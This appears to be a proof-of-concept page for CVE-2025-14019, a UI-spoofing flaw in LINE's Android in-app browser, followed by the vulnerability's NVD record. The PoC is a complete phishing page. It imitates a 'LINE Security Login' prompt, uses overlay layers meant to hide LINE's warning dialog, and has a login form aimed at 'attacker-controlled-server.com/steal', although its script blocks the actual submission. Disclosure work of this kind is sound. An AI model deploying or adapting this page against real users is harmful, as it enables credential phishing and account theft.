CVE-2025-14019

<!-- CVE-2025-14019 PoC: UI Spoofing in LINE Android In-App Browser --> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LINE UI Spoofing PoC - CVE-2025-14019</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; } /* This overlay can obscure the LINE warning dialog */ .line-warning-obfuscator { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 999999; background: transparent; pointer-events: none; } .phishing-container { background: white; border-radius: 20px; padding: 40px; max-width: 400px; width: 90%; box-shadow: 0 20px 60px rgba(0,0,0,0.3); position: relative; z-index: 1; } .fake-line-header { background: #00B900; color: white; padding: 15px 20px; border-radius: 10px 10px 0 0; margin: -40px -40px 20px -40px; text-align: center; font-weight: bold; } .fake-login-form { margin-top: 20px; } .fake-input { width: 100%; padding: 15px; margin: 10px 0; border: 2px solid #e0e0e0; border-radius: 8px; font-size: 16px; transition: border-color 0.3s; } .fake-input:focus { outline: none; border-color: #00B900; } .fake-submit-btn { width: 100%; padding: 15px; background: #00B900; color: white; border: none; border-radius: 8px; font-size: 16px; font-weight: bold; cursor: pointer; margin-top: 20px; transition: background 0.3s; } .fake-submit-btn:hover { background: #009900; } .warning-text { color: #ff4444; font-size: 12px; margin-top: 15px; text-align: center; } .obfuscation-layer { position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; height: 200px; background: rgba(255,255,255,0.01); z-index: 999998; display: none; } @media screen and (max-width: 480px) { .phishing-container { padding: 30px 20px; } .fake-line-header { margin: -30px -20px 15px -20px; padding: 12px 15px; } } </style> </head> <body> <!-- Overlay to potentially obscure LINE warning dialog --> <div class="line-warning-obfuscator"></div> <div class="obfuscation-layer"></div> <div class="phishing-container"> <div class="fake-line-header"> LINE Security Login </div> <h2 style="text-align: center; color: #333; margin-bottom: 10px;"> Please Verify Your Account </h2> <p style="text-align: center; color: #666; margin-bottom: 20px; font-size: 14px;"> Your session has expired. Please login again to continue. </p> <form class="fake-login-form" action="https://attacker-controlled-server.com/steal" method="POST"> <input type="text" class="fake-input" placeholder="Email or LINE ID" required> <input type="password" class="fake-input" placeholder="Password" required> <button type="submit" class="fake-submit-btn">Login</button> </form> <p class="warning-text"> ⚠️ This is a PoC for CVE-2025-14019 </p> </div> <script> // Dynamically adjust obfuscation based on LINE warning dialog position function adjustObfuscation() { const warningDialog = document.querySelector('[class*="warning"], [class*="alert"], [role="alert"]'); if (warningDialog) { const rect = warningDialog.getBoundingClientRect(); const obfuscator = document.querySelector('.line-warning-obfuscator'); obfuscator.style.top = rect.top + 'px'; obfuscator.style.left = rect.left + 'px'; obfuscator.style.width = rect.width + 'px'; obfuscator.style.height = rect.height + 'px'; } } // Monitor for warning dialog appearance setInterval(adjustObfuscation, 100); // Log credentials when submitted (for PoC purposes) document.querySelector('.fake-login-form').addEventListener('submit', function(e) { e.preventDefault(); console.log('PoC: Credentials captured'); alert('PoC: In a real attack, credentials would be sent to attacker server.'); }); </script> </body> </html>

{"cve": {"id": "CVE-2025-14019", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:49.437", "lastModified": "2025-12-19T18:22:43.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LINE client for Android versions from 13.8 to 15.5 is vulnerable to UI spoofing in the in-app browser where a specific layout could obscure the full-screen warning prompt, potentially allowing attackers to conduct phishing attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:android:*:*", "versionStartIncluding": "13.8.0", "versionEndIncluding": "15.5.0", "matchCriteriaId": "5106993F-3EBE-4D03-8735-1CB1CB463C41"}]}]}], "references": [{"url": "https://hackerone.com/reports/3062270", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}]}}